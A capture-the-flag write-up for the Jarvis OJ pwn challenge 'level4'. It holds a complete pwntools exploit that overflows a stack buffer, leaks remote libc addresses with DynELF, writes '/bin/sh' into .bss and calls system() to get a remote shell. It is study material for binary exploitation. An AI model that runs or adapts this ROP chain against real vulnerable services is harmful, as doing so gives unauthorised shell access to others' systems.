[XMAN]level4
nc pwn2.jarvisoj.com 9880
level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0
题目未提供libc，无法直接查符号偏移，因此利用pwntools的DynELF：用write@plt构造任意地址泄露原语，由DynELF沿link_map解析出远程libc中system的地址。
exp如下（Python 3 + pwntools）:
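from pwn import *

# Fixed 32-bit addresses taken from the original chain (non-PIE, 0x0804xxxx
# range). The names below are the reviewer's reading of how each value is
# used; confirm every one against the binary (objdump -d ./level4).
PADDING = 140            # bytes of filler before the overwritten return address
WRITE_PLT = 0x8048340    # called as fn(1, address, 4): presumably write@plt -- TODO confirm
READ_PLT = 0x8048310     # called as fn(0, BSS_BUF, 8): presumably read@plt -- TODO confirm
VULN_FUNC = 0x804844B    # fake return address: re-enters the overflowable function
BSS_BUF = 0x804A100      # writable scratch address that receives "/bin/sh\0" -- TODO confirm


def leak(address):
    """Leak 4 bytes at *address* via the ROP chain write(1, address, 4).

    This is the DynELF callback, so it must return the raw bytes that
    live at *address*. recvn(4) is used instead of recv(4): recv may
    return fewer bytes than requested when the data arrives in pieces,
    and a short leak silently corrupts DynELF's symbol resolution.
    Uses the module-level tube ``io``, which must be connected first.
    """
    payload = (b'a' * PADDING + p32(WRITE_PLT) + p32(VULN_FUNC)
               + p32(1) + p32(address) + p32(4))
    io.send(payload)
    return io.recvn(4)


# Target selection. Local alternatives kept for reproducing the chain offline:
#   io = process('./level4')
#   io = gdb.debug('./level4', 'b *0x804844B')
io = remote("pwn2.jarvisoj.com", 9880)

# No libc provided: resolve system() remotely through the leak primitive.
d = DynELF(leak, elf=ELF("./level4"))
system_addr = d.lookup("system", "libc")
info("system_addr: " + hex(system_addr))  # hex() already returns str

# Stage 2: read(0, BSS_BUF, 8) to place "/bin/sh\0" (exactly 8 bytes) in writable memory.
payload = (b'a' * PADDING + p32(READ_PLT) + p32(VULN_FUNC)
           + p32(0) + p32(BSS_BUF) + p32(8))
io.send(payload)
sleep(0.5)  # let the remote reach read() before the string is sent
io.send(b'/bin/sh\0')

# Stage 3: system(BSS_BUF). VULN_FUNC sits in the return slot so the process
# re-enters the vulnerable function instead of faulting when system returns.
payload = b'a' * PADDING + p32(system_addr) + p32(VULN_FUNC) + p32(BSS_BUF)
sleep(0.5)
io.send(payload)
io.interactive()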